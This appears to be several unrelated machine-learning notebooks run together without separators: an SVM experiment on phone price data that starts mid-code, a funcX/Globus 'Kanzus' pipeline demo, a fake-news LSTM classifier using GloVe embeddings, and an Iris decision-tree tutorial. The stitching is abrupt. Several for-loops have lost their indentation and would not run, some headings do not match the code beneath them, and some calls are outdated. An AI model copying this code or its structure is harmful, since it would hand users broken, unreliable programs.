    print("Train Strategy :{} \n Score :{:.2f}".format(strat,dummy_maj.score(X_train,Y_train)))
    print("Test Strategy :{} \n Score :{:.2f}".format(strat,dummy_maj.score(X_test,Y_test)))
# plotting the decision boundaries for the data
#converting the data to array for plotting.
X = np.array(df.iloc[:,[0,13]])
y = np.array(df['price_range'])
print("Shape of X:"+str(X.shape))
print("Shape of y:"+str(y.shape))
X = scaler.fit_transform(X)
# custom color maps
cm_dark = ListedColormap(['#ff6060', '#8282ff','#ffaa00','#fff244','#4df9b9','#76e8fc','#3ad628'])
cm_bright = ListedColormap(['#ffafaf', '#c6c6ff','#ffaa00','#ffe2a8','#bfffe7','#c9f7ff','#9eff93'])
plt.scatter(X[:,0],X[:,1],c=y,cmap=cm_dark,s=10,label=y)
plt.show()
h = .02 # step size in the mesh
C_param = 1 # SVM regularization parameter C
# create a linear SVM classifier on the two selected features and fit the data
clf1 = SVC(kernel='linear',C=C_param)
clf1.fit(X, y)
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, x_max]x[y_min, y_max].
x_min, x_max = X[:, 0].min()-.20, X[:, 0].max()+.20
y_min, y_max = X[:, 1].min()-.20, X[:, 1].max()+.20
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
                     np.arange(y_min, y_max, h))
Z = clf1.predict(np.c_[xx.ravel(), yy.ravel()]) # ravel to flatten into 1D and c_ to concatenate
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.figure()
plt.pcolormesh(xx, yy, Z, cmap=cm_bright)
# Plot also the training points
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=cm_dark,
            edgecolor='k', s=20)
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.title("SVM Linear Classification (kernel = linear, C = '%s')"% (C_param))
plt.show()
print("The score of the above :"+str(clf1.score(X,y)))
# Linear Support vector machine with only C Parameter
from sklearn.svm import LinearSVC
for this_C in [1,3,5,10,40,60,80,100]:
clf2 = LinearSVC(C=this_C).fit(X_train,Y_train)
scoretrain = clf2.score(X_train,Y_train)
scoretest = clf2.score(X_test,Y_test)
print("Linear SVM value of C:{}, training score :{:2f} , Test Score: {:2f} \n".format(this_C,scoretrain,scoretest))
from sklearn.svm import SVR
svr = SVR(kernel='linear',C=1,epsilon=.01).fit(X_train,Y_train)
print("{:.2f} is the R^2 score of the SV Regressor on the training data".format(svr.score(X_train,Y_train)))
#NON-LINEAR SVM
# SVM with RBF KERNEL AND ONLY THE C PARAMETER
for this_C in [1,5,10,25,50,100]:
clf3 = SVC(kernel='rbf',C=this_C).fit(X_train,Y_train)
clf3train = clf3.score(X_train,Y_train)
clf3test = clf3.score(X_test,Y_test)
print("SVM for Non Linear \n C:{} Training Score : {:2f} Test Score : {:2f}\n".format(this_C,clf3train,clf3test))
# SVM WITH RBF KERNEL, C AND GAMMA HYPERPARAMETERS
for this_gamma in [.1,.5,.10,.25,.50,1]:
for this_C in [1,5,7,10,15,25,50]:
clf3 = SVC(kernel='rbf',C=this_C,gamma=this_gamma).fit(X_train,Y_train)
clf3train = clf3.score(X_train,Y_train)
clf3test = clf3.score(X_test,Y_test)
print("SVM for Non Linear \n Gamma: {} C:{} Training Score : {:2f} Test Score : {:2f}\n".format(this_gamma,this_C,clf3train,clf3test))
# grid search method
from sklearn.model_selection import GridSearchCV
param_grid = {'C': [1,5,7,10,15,25,50],
'gamma': [.1,.5,.10,.25,.50,1]}
GS = GridSearchCV(SVC(kernel='rbf'),param_grid,cv=5)
GS.fit(X_train,Y_train)
print("the parameters {} are the best.".format(GS.best_params_))
print("the best score is {:.2f}.".format(GS.best_score_))
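# (Added sketch) With refit=True (the GridSearchCV default), the best estimator has already been
# refit on the full training split, so it can be scored directly on the held-out test split:
print("test-set score of the best RBF SVM: {:.2f}".format(GS.score(X_test, Y_test)))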
# Kernelized SVM regressor (uses the default RBF kernel; 'degree' only matters for kernel='poly')
svr2 = SVR(degree=2,C=100,epsilon=.01).fit(X_train,Y_train)
print("{:.2f} is the R^2 score of the SV Regressor on the training data".format(svr2.score(X_train,Y_train)))
test = test.drop(['id'],axis=1)
test.head()
test_mat = np.array(test)
test_scaled = scaler.fit_transform(test_mat) # note: this refits the scaler on the test features alone
clf4 = SVC(kernel='rbf',C=25,gamma=.1).fit(X_train,Y_train)
prediction = clf4.predict(test_scaled) # predict on scaled features, matching how the model was trained
pred = pd.DataFrame(prediction)
pred.head()
pred.info()
prediction = svr2.predict(test_scaled)
pred = pd.DataFrame(prediction)
pred.head()
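# (Added sketch) The predictions could be persisted for later inspection; the filename is arbitrary.
pred.to_csv('svr_price_predictions.csv', index=False)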
```
# Kanzus Pipeline Example
This notebook demonstrates how the Kanzus pipeline is used to perform on-demand distributed analysis.
```
import os
import sys
import json
import time
import numpy as np
from funcx.sdk.client import FuncXClient
from gladier.client import GladierClient as GladierBaseClient
from globus_automate_client import create_flows_client, create_action_client
```
## Creating and using pipelines
Here we create a simple pipeline to move data and run an analysis function. The pipeline is just two steps but shows how Globus Automate and funcX can be used to create a reliable and secure distributed flow.
### Register a function to use
Start by defining a function and registering it with funcX. This function will be used within the example pipeline.
```
fxc = FuncXClient()
def file_size(data):
"""Return the size of a file"""
import os
return os.path.getsize(data['pathname'])
func_uuid = fxc.register_function(file_size)
```
Test that the function works on some data
```
payload = {'pathname': '/etc/hostname'}
theta_ep = '6c4323f4-a062-4551-a883-146a352a43f5'
res = fxc.run(payload, endpoint_id=theta_ep, function_id=func_uuid)
fxc.get_result(res)
```
### Define a flow for the function
Now define a flow to perform a Globus Transfer and then run the above function.
```
flow_definition = {
"Comment": "An analysis flow",
"StartAt": "Transfer",
"States": {
"Transfer": {
"Comment": "Initial transfer",
"Type": "Action",
"ActionUrl": "https://actions.automate.globus.org/transfer/transfer",
"Parameters": {
"source_endpoint_id.$": "$.input.source_endpoint",
"destination_endpoint_id.$": "$.input.dest_endpoint",
"transfer_items": [
{
"source_path.$": "$.input.source_path",
"destination_path.$": "$.input.dest_path",
"recursive": False
}
]
},
"ResultPath": "$.Transfer1Result",
"Next": "Analyze"
},
"Analyze": {
"Comment": "Run a funcX function",
"Type": "Action",
"ActionUrl": "https://api.funcx.org/automate",
"ActionScope": "https://auth.globus.org/scopes/facd7ccc-c5f4-42aa-916b-a0e270e2c2a9/automate2",
"Parameters": {
"tasks": [{
"endpoint.$": "$.input.fx_ep",
"func.$": "$.input.fx_id",
"payload": {
"pathname.$": "$.input.pathname"
}
}]
},
"ResultPath": "$.AnalyzeResult",
"End": True
}
}
}
```
Register and run the flow
```
flows_client = create_flows_client()
flow = flows_client.deploy_flow(flow_definition, title="Stills process workflow")
flow_id = flow['id']
flow_scope = flow['globus_auth_scope']
print(f'Newly created flow with id: {flow_id}')
src_ep = 'ddb59aef-6d04-11e5-ba46-22000b92c6ec' # EP1
dest_ep = 'ddb59af0-6d04-11e5-ba46-22000b92c6ec' # EP2
filename = 'test.txt'
flow_input = {
"input": {
"source_endpoint": src_ep,
"source_path": f"/~/{filename}",
"dest_endpoint": dest_ep,
"dest_path": f"/~/{filename}",
"result_path": f"/~/out_{filename}",
"fx_id": func_uuid,
"fx_ep": theta_ep,
"pathname": '/etc/hostname'
}
}
flow_action = flows_client.run_flow(flow_id, flow_scope, flow_input)
print(flow_action)
flow_action_id = flow_action['action_id']
flow_status = flow_action['status']
print(f'Flow action started with id: {flow_action_id}')
while flow_status == 'ACTIVE':
time.sleep(10)
flow_action = flows_client.flow_action_status(flow_id, flow_scope, flow_action_id)
flow_status = flow_action['status']
print(f'Flow status: {flow_status}')
flow_action['details']['output']['AnalyzeResult']
```
## Gladier Beam XY Search
Gladier removes much of this complexity by managing the registration of functions and flows and re-registering them when they change. Here we create a Gladier client and specify the tools that will be used in the flow.
```
from gladier_kanzus.flows.search_flow import flow_definition
class KanzusXYSearchClient(GladierBaseClient):
client_id = 'e6c75d97-532a-4c88-b031-8584a319fa3e'
gladier_tools = [
'gladier_kanzus.tools.XYSearch',
'gladier_kanzus.tools.CreatePhil',
'gladier_kanzus.tools.DialsStills',
'gladier_kanzus.tools.XYPlot',
'gladier_kanzus.tools.SSXGatherData',
'gladier_kanzus.tools.SSXPublish',
]
flow_definition = flow_definition
search_client = KanzusXYSearchClient()
```
Register the stills function in a container
```
from gladier_kanzus.tools.dials_stills import funcx_stills_process as stills_cont
container = '/home/rvescovi/.funcx/containers/dials_v1.simg'
dials_cont_id = fxc.register_container(location=container, container_type='singularity')
stills_cont_fxid = fxc.register_function(stills_cont, container_uuid=dials_cont_id)
```
Define input to the flow. This describes the dataset that will be analyzed and the parameters for analysis.
```
conf = {'local_endpoint': '8f2f2eab-90d2-45ba-a771-b96e6d530cad',
'queue_endpoint': '23519765-ef2e-4df2-b125-e99de9154611',
}
data_dir = '/eagle/APSDataAnalysis/SSX/Demo/test'
proc_dir = f'{data_dir}/xy'
upload_dir = f'{data_dir}/test_images'
flow_input = {
"input": {
#Processing variables
"proc_dir": proc_dir,
"data_dir": data_dir,
"upload_dir": upload_dir,
#Dials specific variables.
"input_files": "Test_33_{00000..00010}.cbf",
"input_range": "00000..00010",
"nproc": 10,
"beamx": "-214.400",
"beamy": "218.200",
# xy search parameters
"step": "1",
# funcX endpoints
"funcx_local_ep": conf['local_endpoint'],
"funcx_queue_ep": conf['queue_endpoint'],
# container hack for stills
"stills_cont_fxid": stills_cont_fxid,
# publication
"trigger_name": f"{data_dir}/Test_33_00001.cbf"
}
}
flow_input['input']
phils_flow = search_client.start_flow(flow_input=flow_input)
```
Check the results:
https://petreldata.net/kanzus/projects/ssx/globus%253A%252F%252Fc7683485-3c3f-454a-94c0-74310c80b32a%252Fssx%252Ftest_images/
# Kanzus Pipeline
The full Kanzus pipeline is designed to be triggered as data are collected. It moves data to ALCF, performs analysis, analyzes the PRIME results, and publishes results to the portal.
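A rough sketch of such a trigger is shown below. It simply polls a data directory and starts a flow for each new image file, reusing the XY-search client and `flow_input` from the example above purely for illustration; the directory path, file pattern, and polling interval are assumptions, not the production trigger used at the beamline.
```
import glob
import time

# Hypothetical watcher: poll the data directory and start a flow for each new .cbf file.
seen = set()
watch_dir = '/eagle/APSDataAnalysis/SSX/Demo/test'  # reusing the demo directory from above

while True:
    for path in sorted(glob.glob(f'{watch_dir}/*.cbf')):
        if path in seen:
            continue
        seen.add(path)
        # Reuse the flow_input built earlier, pointing the trigger at the new file
        flow_input['input']['trigger_name'] = path
        search_client.start_flow(flow_input=flow_input)
        print(f'Started a flow for {path}')
    time.sleep(30)
```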
# Virtual Beamline
# WHY IS FAKE NEWS A PROBLEM?
**Fake news refers to misinformation, disinformation or mal-information spread through word of mouth and traditional media, and more recently through digital forms of communication such as edited videos, memes, unverified advertisements and rumours propagated on social media. Fake news spread through social media has become a serious problem, with the potential to result in mob violence, suicides and other harm caused by the misinformation in circulation.**

# BRIEF DESCRIPTION OF DATASET
**This dataset consists of about 40,000 articles, both fake and real news. Our aim is to train a model that can correctly predict whether a given piece of news is real or fake. The fake and the real news come in two separate files, each containing roughly 20,000 articles.**
```
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
# Any results you write to the current directory are saved as output.
```
# LOADING THE NECESSARY LIBRARIES
```
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import nltk
from sklearn.preprocessing import LabelBinarizer
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
from wordcloud import WordCloud,STOPWORDS
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize,sent_tokenize
from bs4 import BeautifulSoup
import re,string,unicodedata
from keras.preprocessing import text, sequence
from sklearn.metrics import classification_report,confusion_matrix,accuracy_score
from sklearn.model_selection import train_test_split
from string import punctuation
from nltk import pos_tag
from nltk.corpus import wordnet
import keras
from keras.models import Sequential
from keras.layers import Dense,Embedding,LSTM,Dropout
from keras.callbacks import ReduceLROnPlateau
import tensorflow as tf
```
# IMPORTING THE DATASET
```
true = pd.read_csv("../input/fake-and-real-news-dataset/True.csv")
false = pd.read_csv("../input/fake-and-real-news-dataset/Fake.csv")
```
# DATA VISUALIZATION AND PREPROCESSING
```
true.head()
false.head()
true['category'] = 1
false['category'] = 0
df = pd.concat([true,false]) #Merging the 2 datasets
sns.set_style("darkgrid")
sns.countplot(df.category)
```
**SO, WE CAN SEE THAT THE DATASET IS BALANCED**
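We can also confirm this numerically with a quick check (a small addition for clarity, not in the original notebook):
```
# Count the number of articles in each class (1 = real, 0 = fake)
print(df['category'].value_counts())
```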
```
df.head()
df.isna().sum() # Checking for nan Values
df.title.count()
df.subject.value_counts()
```
**MERGING ALL THE TEXT DATA INTO 1 COLUMN i.e. 'text'**
```
plt.figure(figsize = (12,8))
sns.set(style = "whitegrid",font_scale = 1.2)
chart = sns.countplot(x = "subject", hue = "category" , data = df)
chart.set_xticklabels(chart.get_xticklabels(),rotation=90)
```
**SINCE THE TOPICS IN THE SUBJECT COLUMN ARE DIFFERENT FOR THE TWO CATEGORIES, WE HAVE TO EXCLUDE IT FROM THE FINAL TEXT COLUMN**
```
df['text'] = df['text'] + " " + df['title']
del df['title']
del df['subject']
del df['date']
```
**WHAT ARE STOPWORDS?**
**Stopwords are English words that do not add much meaning to a sentence. They can safely be ignored without sacrificing the meaning of the sentence, for example words like "the", "he" and "have". Such words are already collected in NLTK's stopwords corpus, which we first make available in our Python environment.**
```
stop = set(stopwords.words('english'))
punctuation = list(string.punctuation)
stop.update(punctuation)
```
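If the NLTK stopwords corpus is not already available in your environment (the original notebook assumes it is), it can be downloaded with the snippet below; this is a one-time setup step added here for completeness:
```
import nltk

# Fetch the corpus used by stopwords.words('english') above
nltk.download('stopwords')
```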
**DATA CLEANING**
```
def strip_html(text):
    soup = BeautifulSoup(text, "html.parser")
    return soup.get_text()
#Removing the square brackets
def remove_between_square_brackets(text):
    return re.sub(r'\[[^]]*\]', '', text)
# Removing URLs (the original defined this with the same name as the function above, which silently shadowed it)
def remove_urls(text):
    return re.sub(r'http\S+', '', text)
#Removing the stopwords from text
def remove_stopwords(text):
    final_text = []
    for i in text.split():
        if i.strip().lower() not in stop:
            final_text.append(i.strip())
    return " ".join(final_text)
#Removing the noisy text
def denoise_text(text):
    text = strip_html(text)
    text = remove_between_square_brackets(text)
    text = remove_urls(text)
    text = remove_stopwords(text)
    return text
#Apply the cleaning function on the text column
df['text']=df['text'].apply(denoise_text)
```
**WORDCLOUD FOR REAL TEXT (LABEL - 1)**
```
plt.figure(figsize = (20,20)) # Text that is not Fake
wc = WordCloud(max_words = 2000 , width = 1600 , height = 800 , stopwords = STOPWORDS).generate(" ".join(df[df.category == 1].text))
plt.imshow(wc , interpolation = 'bilinear')
```
**WORDCLOUD FOR FAKE TEXT (LABEL - 0)**
```
plt.figure(figsize = (20,20)) # Text that is Fake
wc = WordCloud(max_words = 2000 , width = 1600 , height = 800 , stopwords = STOPWORDS).generate(" ".join(df[df.category == 0].text))
plt.imshow(wc , interpolation = 'bilinear')
```
**Number of characters in texts**
```
fig,(ax1,ax2)=plt.subplots(1,2,figsize=(12,8))
text_len=df[df['category']==1]['text'].str.len()
ax1.hist(text_len,color='red')
ax1.set_title('Original text')
text_len=df[df['category']==0]['text'].str.len()
ax2.hist(text_len,color='green')
ax2.set_title('Fake text')
fig.suptitle('Characters in texts')
plt.show()
```
**The two distributions look somewhat different: texts of around 2,500 characters are the most common in the original-news category, while texts of around 5,000 characters are the most common in the fake-news category.**
**Number of words in each text**
```
fig,(ax1,ax2)=plt.subplots(1,2,figsize=(12,8))
text_len=df[df['category']==1]['text'].str.split().map(lambda x: len(x))
ax1.hist(text_len,color='red')
ax1.set_title('Original text')
text_len=df[df['category']==0]['text'].str.split().map(lambda x: len(x))
ax2.hist(text_len,color='green')
ax2.set_title('Fake text')
fig.suptitle('Words in texts')
plt.show()
```
**Average word length in a text**
```
fig,(ax1,ax2)=plt.subplots(1,2,figsize=(20,10))
word=df[df['category']==1]['text'].str.split().apply(lambda x : [len(i) for i in x])
sns.distplot(word.map(lambda x: np.mean(x)),ax=ax1,color='red')
ax1.set_title('Original text')
word=df[df['category']==0]['text'].str.split().apply(lambda x : [len(i) for i in x])
sns.distplot(word.map(lambda x: np.mean(x)),ax=ax2,color='green')
ax2.set_title('Fake text')
fig.suptitle('Average word length in each text')
def get_corpus(text):
words = []
for i in text:
for j in i.split():
words.append(j.strip())
return words
corpus = get_corpus(df.text)
corpus[:5]
from collections import Counter
counter = Counter(corpus)
most_common = counter.most_common(10)
most_common = dict(most_common)
most_common
from sklearn.feature_extraction.text import CountVectorizer
def get_top_text_ngrams(corpus, n, g):
vec = CountVectorizer(ngram_range=(g, g)).fit(corpus)
bag_of_words = vec.transform(corpus)
sum_words = bag_of_words.sum(axis=0)
words_freq = [(word, sum_words[0, idx]) for word, idx in vec.vocabulary_.items()]
words_freq =sorted(words_freq, key = lambda x: x[1], reverse=True)
return words_freq[:n]
```
**Unigram Analysis**
```
plt.figure(figsize = (16,9))
most_common_uni = get_top_text_ngrams(df.text,10,1)
most_common_uni = dict(most_common_uni)
sns.barplot(x=list(most_common_uni.values()),y=list(most_common_uni.keys()))
```
**Bigram Analysis**
```
plt.figure(figsize = (16,9))
most_common_bi = get_top_text_ngrams(df.text,10,2)
most_common_bi = dict(most_common_bi)
sns.barplot(x=list(most_common_bi.values()),y=list(most_common_bi.keys()))
```
**Trigram Analysis**
```
plt.figure(figsize = (16,9))
most_common_tri = get_top_text_ngrams(df.text,10,3)
most_common_tri = dict(most_common_tri)
sns.barplot(x=list(most_common_tri.values()),y=list(most_common_tri.keys()))
```
**Splitting the data into 2 parts - training and testing data**
```
x_train,x_test,y_train,y_test = train_test_split(df.text,df.category,random_state = 0)
max_features = 10000
maxlen = 300
```
**Tokenizing text -> representing each word by a number**
**The mapping from each original word to its number is preserved in the tokenizer's word_index property**
**The Tokenizer applies basic processing such as lower-casing by default; this can be turned off by explicitly setting the corresponding option to False**
**Let's cap every news item at 300 tokens, padding items shorter than 300 words and truncating longer ones**
```
tokenizer = text.Tokenizer(num_words=max_features)
tokenizer.fit_on_texts(x_train)
tokenized_train = tokenizer.texts_to_sequences(x_train)
x_train = sequence.pad_sequences(tokenized_train, maxlen=maxlen)
tokenized_test = tokenizer.texts_to_sequences(x_test)
X_test = sequence.pad_sequences(tokenized_test, maxlen=maxlen)
```
# Introduction to GloVe
**The GloVe method is built on an important idea: you can derive semantic relationships between words from the co-occurrence matrix. Given a corpus with V words, the co-occurrence matrix X is a V x V matrix whose entry X_ij (row i, column j) counts how many times word i has co-occurred with word j. An example co-occurrence matrix might look as follows.**

**The co-occurrence matrix for the sentence "the cat sat on the mat" with a window size of 1. As you probably noticed, it is a symmetric matrix. How do we get a metric that measures semantic similarity between words from this? For that, you will need three words at a time.**
**Consider the ratio P_ik/P_jk, where P_ik = X_ik/X_i. Here P_ik denotes the probability of seeing words i and k together, computed by dividing the number of times i and k appeared together (X_ik) by the total number of times word i appeared in the corpus (X_i). Given two words i = ice and j = steam, and a third "probe" word k:**
* **if k is very similar to ice but irrelevant to steam (e.g. k = solid), P_ik/P_jk will be very high (>1);**
* **if k is very similar to steam but irrelevant to ice (e.g. k = gas), P_ik/P_jk will be very small (<1);**
* **if k is related to both words or to neither, P_ik/P_jk will be close to 1.**
**So, if we can find a way to incorporate P_ik/P_jk into computing word vectors, we achieve the goal of using global statistics when learning word vectors.**
**Source Credits - https://towardsdatascience.com/light-on-math-ml-intuitive-guide-to-understanding-glove-embeddings-b13b4f19c010**
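To make the co-occurrence idea concrete, here is a small sketch (not part of the original notebook) that builds the window-size-1 co-occurrence counts for the sentence used above:
```
from collections import defaultdict

sentence = "the cat sat on the mat".split()
window = 1

# X[i][j] counts how often word j appears within `window` positions of word i
X = defaultdict(lambda: defaultdict(int))
for pos, word in enumerate(sentence):
    for other in range(max(0, pos - window), min(len(sentence), pos + window + 1)):
        if other != pos:
            X[word][sentence[other]] += 1

for w in sorted(set(sentence)):
    print(w, dict(X[w]))
# The matrix is symmetric, e.g. X['cat']['sat'] == X['sat']['cat']
```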
```
EMBEDDING_FILE = '../input/glove-twitter/glove.twitter.27B.100d.txt'
def get_coefs(word, *arr):
return word, np.asarray(arr, dtype='float32')
embeddings_index = dict(get_coefs(*o.rstrip().rsplit(' ')) for o in open(EMBEDDING_FILE))
all_embs = np.stack(embeddings_index.values())
emb_mean,emb_std = all_embs.mean(), all_embs.std()
embed_size = all_embs.shape[1]
word_index = tokenizer.word_index
nb_words = min(max_features, len(word_index))
#change below line if computing normal stats is too slow
embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
if i >= max_features: continue
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None: embedding_matrix[i] = embedding_vector
```
**Some Model Parameters**
```
batch_size = 256
epochs = 10
embed_size = 100
learning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy', patience = 2, verbose=1,factor=0.5, min_lr=0.00001)
```
# TRAINING THE MODEL
```
x_train[0]
#Defining Neural Network
model = Sequential()
#Non-trainable embedding layer
model.add(Embedding(max_features, output_dim=embed_size, weights=[embedding_matrix], input_length=maxlen, trainable=False))
#LSTM
model.add(LSTM(units=128 , return_sequences = True , recurrent_dropout = 0.25 , dropout = 0.25))
model.add(LSTM(units=64 , recurrent_dropout = 0.1 , dropout = 0.1))
model.add(Dense(units = 32 , activation = 'relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer=keras.optimizers.Adam(lr = 0.01), loss='binary_crossentropy', metrics=['accuracy'])
model.summary()
history = model.fit(x_train, y_train, batch_size = batch_size , validation_data = (X_test,y_test) , epochs = epochs , callbacks = [learning_rate_reduction])
```
# ANALYSIS AFTER TRAINING OF MODEL
```
print("Accuracy of the model on Training Data is - " , model.evaluate(x_train,y_train)[1]*100 , "%")
print("Accuracy of the model on Testing Data is - " , model.evaluate(X_test,y_test)[1]*100 , "%")
epochs = [i for i in range(10)]
fig , ax = plt.subplots(1,2)
train_acc = history.history['accuracy']
train_loss = history.history['loss']
val_acc = history.history['val_accuracy']
val_loss = history.history['val_loss']
fig.set_size_inches(20,10)
ax[0].plot(epochs , train_acc , 'go-' , label = 'Training Accuracy')
ax[0].plot(epochs , val_acc , 'ro-' , label = 'Testing Accuracy')
ax[0].set_title('Training & Testing Accuracy')
ax[0].legend()
ax[0].set_xlabel("Epochs")
ax[0].set_ylabel("Accuracy")
ax[1].plot(epochs , train_loss , 'go-' , label = 'Training Loss')
ax[1].plot(epochs , val_loss , 'ro-' , label = 'Testing Loss')
ax[1].set_title('Training & Testing Loss')
ax[1].legend()
ax[1].set_xlabel("Epochs")
ax[1].set_ylabel("Loss")
plt.show()
pred = model.predict_classes(X_test)
pred[:5]
print(classification_report(y_test, pred, target_names = ['Fake','Not Fake']))
cm = confusion_matrix(y_test,pred)
cm
cm = pd.DataFrame(cm , index = ['Fake','Original'] , columns = ['Fake','Original'])
plt.figure(figsize = (10,10))
sns.heatmap(cm,cmap= "Blues", linecolor = 'black' , linewidth = 1 , annot = True, fmt='' , xticklabels = ['Fake','Original'] , yticklabels = ['Fake','Original'])
plt.xlabel("Predicted")
plt.ylabel("Actual")
```
**PLS UPVOTE THIS NOTEBOOK IF YOU LIKE IT! THANKS FOR YOUR TIME !**
Let's classify iris species using the Iris data.
It is one of the datasets built into sklearn.
petal: the flower petal, sepal: the flower calyx
1. Prepare the data and take a closer look
```
#Load the data
from sklearn.datasets import load_iris
iris = load_iris()
print(type(dir(iris)))
#dir() lists the variables and methods an object has
#Check which pieces of information iris contains using the keys() method
iris.keys()
#Store the most important data in the iris_data variable and check its shape
iris_data = iris.data
print(iris_data.shape)
iris_data[0]
#In order: sepal length, sepal width, petal length, petal width
#Given the petal and sepal measurements, we want to predict which of the three species a flower belongs to
#The machine learning model has to be trained to output the iris species from the petal/sepal length and width
#The answer the model has to output is called the label, or the target
iris_label = iris.target
print(iris_label.shape)
iris_label
#What do the numbers stored in this target represent?
#The label names can be checked in target_names
iris.target_names
#In order: 0, 1, 2
print(iris.DESCR)
iris.feature_names
#Contains a description of each of the 4 features
iris.filename  # Path where the dataset file is stored
```
2. Prepare the problem set and the answer sheet for training the machine learning model
```
#pandas is widely used in Python for handling two-dimensional, table-shaped data
#The iris data is also 2D data with rows and columns, so let's use pandas
import pandas as pd
print(pd.__version__)
#Convert the iris dataset into the DataFrame type that pandas provides
iris_df = pd.DataFrame(data=iris_data, columns=iris.feature_names)
#For understanding, print iris_data and iris.feature_names
print(iris_data)
print(iris.feature_names)
#Take a look at the DataFrame built from these two
iris_df.head()
#Having the answer data alongside makes the data easier to handle, so add a column called label
iris.target
iris_df["label"] = iris.target
iris_df.head()
#The 4 feature columns are like the problem set the machine learning model has to solve
#Given the problem [5.1, 3.5, 1.4, 0.2], the model should answer 0, i.e. setosa
#So the label data expressed as 0, 1, 2 is the answer sheet for the model
#Problem set: the data fed into the model, also called features; the variable is usually named X
#Answer sheet: the data the model has to predict, called the label or target; the variable is usually named y
#To train a machine learning model we need to split the data into
#a training dataset used for learning and
#a test dataset used to evaluate the model's performance
#Splitting the dataset is easy with the train_test_split function provided by scikit-learn
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(iris_data,
                                                    iris_label,
                                                    test_size=0.2,
                                                    random_state=7)
print('Number of X_train samples: ', len(X_train), 'Number of X_test samples: ', len(X_test))
#The first parameter, iris_data, is the problem set, i.e. the features
#The second parameter, iris_label, is the answers, i.e. the label
#This gives us X with only the 4 features
#and y with only the answers
#The third argument, test_size, controls the size of the test dataset; 0.2 means 20% of the whole
#Finally, random_state determines the randomness used to split the train and test data
#If we split this data as-is, the last 20% becomes the test set,
#so the test set would consist only of data with label 2
#That is why a random shuffle is needed when splitting, and random_state controls it
#Randomness on a computer is determined by a specific logic, so it is not perfectly random
#That is why a value such as random_state or random_seed is used to control it
#With the same value, the code always produces the same "random" result
#Check the datasets
print(X_train.shape, y_train.shape)
print(X_test.shape, y_test.shape)
print(y_train)
print()
print( y_test)
#Unlike the label we looked at earlier, the 0, 1, 2 values are now randomly shuffled
```
3. Train the machine learning model
```
#Machine learning: supervised learning and unsupervised learning
#Supervised learning learns from problems with answers; unsupervised learning learns from problems without answers
#Supervised learning is split into two kinds:
#classification and regression
#Classification assigns the input data to one of several categories
#Regression predicts a specific numeric value from the input data
#Predicting the iris species is a classification problem
#An example of a regression problem: predicting a house price from information about the house (rooms, location, floor, etc.)
#The iris problem is supervised learning, and a classification problem
#That makes it clear which kind of machine learning model to use
#There are many classification models; here we use the Decision Tree model
#Decision trees have the drawback that their decision boundaries are perpendicular to the data axes, so they may only work well on certain data
#Random Forest was proposed to overcome this: a model built by combining several Decision Trees
#Put simply, a Decision Tree finds the boundaries along which to split the data,
#classifying it step by step as if passing it through a sieve
#This process involves concepts such as entropy, information gain and Gini impurity, which are worth knowing to understand ML algorithms
#It is built into the sklearn.tree package under the name DecisionTreeClassifier
from sklearn.tree import DecisionTreeClassifier
decision_tree = DecisionTreeClassifier(random_state=32)
print(decision_tree._estimator_type)
#Train the model
decision_tree.fit(X_train, y_train)
#Training the model with the training dataset means
#fitting the model to the training dataset,
#because the model learns whatever patterns exist in the training data
#and makes its predictions according to those patterns.
#In other words, for data that does not exist in the training dataset
#the model does not know what the correct answer category is;
#it only predicts which category new data belongs to,
#using the patterns it learned from the training dataset.
#To predict well on new data,
#how the training dataset is composed matters a great deal:
#the more diverse and general the training data, the better the model can handle new data
```
4. Evaluate the machine learning model
```
y_pred = decision_tree.predict(X_test)
y_pred
#The X_test data contains only the features (the problems)
#So running predict on the trained decision_tree model with X_test
#gives us the model's predictions, y_pred
#Compare them with the actual answers, y_test
y_test
#Use the sklearn.metrics package, which collects performance-evaluation functions
#Check the accuracy first
from sklearn.metrics import accuracy_score
accuracy = accuracy_score(y_test, y_pred)
accuracy
#The fraction of correct predictions out of all predictions, about 90% accuracy
#accuracy = number of correctly predicted samples / total number of predicted samples
```
5. Try other models
```
#Before handling other models, review the whole process of training and predicting with the Decision Tree model
# 1. Import the required modules
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report
# 2. Prepare the data
iris = load_iris()
iris_data = iris.data
iris_label = iris.target
# 3. Split into train and test data
X_train, X_test, y_train, y_test = train_test_split(iris_data,
                                                    iris_label,
                                                    test_size=0.2,
                                                    random_state=7)
# 4. Train the model and predict
decision_tree = DecisionTreeClassifier(random_state=32)
decision_tree.fit(X_train, y_train)
y_pred = decision_tree.predict(X_test)
print(classification_report(y_test, y_pred))
```
Random Forest gathers several Decision Trees into a single model.
By using many copies of a single model, it overcomes the weaknesses of using just one model through collective intelligence; this idea is the ensemble technique.
What does the "Random" in Random Forest refer to?
It is a collection of decision trees in which the features used to build each individual tree are selected at random.
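As a minimal sketch (added here for illustration, using the same train/test split as above), a Random Forest can be tried in exactly the same way as the other classifiers; n_estimators=100 below simply makes the scikit-learn default explicit:
```
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report

# An ensemble of decision trees, each built from randomly selected features/samples
random_forest = RandomForestClassifier(n_estimators=100, random_state=32)
random_forest.fit(X_train, y_train)
y_pred = random_forest.predict(X_test)
print(classification_report(y_test, y_pred))
```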
```
#The SVM model is used as follows.
from sklearn import svm
svm_model = svm.SVC()
